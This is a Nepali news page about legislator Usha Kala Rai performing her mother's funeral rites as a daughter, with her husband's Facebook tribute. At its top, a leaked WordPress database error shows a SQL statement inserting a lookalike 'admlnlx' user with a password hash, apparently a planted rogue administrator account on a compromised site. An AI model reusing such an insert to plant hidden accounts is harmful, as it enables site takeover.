WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHvsckEEc3mSiY/VXl9lfWdEFFoGzR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 06:00:31', '', 'admlnlx', 'admlnlx')

मा उसाकला राईले कपाल मुण्डन गरेर आफ्नो आमाको किरिया गरिन – Gaule Khabar

मा उसाकला राईले कपाल मुण्डन गरेर आफ्नो आमाको किरिया गरिन

मा उसाकला राईले कपाल मुण्डन गरेर आफ्नो आमाको किरिया गरिन

गाउले न्यूज, २६ पौष, काठमाडौं । प्रदेशसभा सांसद उषाकला राईले कपाल मुण्डन गरेर आफ्नो आमाको काजकिरिया गरेकी छन् । निमोनियाको उपचारका क्रममा ग्राण्डी अस्पतालमा लक्ष्मी राईको बुधबार ७५ वर्षको उमेरमा निधन भएको हो ।

मा उषा केस मुण्डन गरेर किरियापुत्री बसेकी छन् । उषाका दाजुभाइ छैनन् । आफन्तले अरुलाई बसाउने वा कोही बसिदिने भनेका थिए तर, राईले आफैं किरियापुत्री बस्ने निर्णय लिएकी हुन् ।

आमाको किरियापुत्री बस्ने श्रीमतीको निर्णयले आफु खुशी भएको र अब ५ दिन सम्म काठमाण्डौ बस्ने तेस्पछी जन्म घर खोटाङ जाने पूर्व कानुन मन्त्री सेर बहादुर तमाङले बताए । साथै फेसबुकमा आफ्नो श्रीमतिको सम्बोधन गरेर यस्तो स्टाटस पनि लेखे:

‘उषाजी तपाईं साँच्चै महान हुनुहुन्छ । छोरीलाई छोरासरह समान अधिकारका लागि निरन्तर लडिरहने तपाईले पहिलो संविधानसभाको सदस्य भएर मौलिक अधिकार समितिमा बसेर त्यसको लैंगिक उपसमितिको संयोजक भएर सम्पूर्ण नेपाली नारीको अधिकारलाई लिपिवद्ध गर्दै नेपालको संविधानमा महिलाको वंशको अधिकार स्थापित गर्न सफल हुनुभयो । आज आˆनो ममतामयी आमा लक्ष्मी राईको निधनमा वास्तविक किरियापुत्री बसेर समाजलाई देखाउनुभएको छ । यो अभियानमा संलग्न अन्य अग्रज नारीहरुलाई मेरो लाखौंलाख सलाम ।’

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका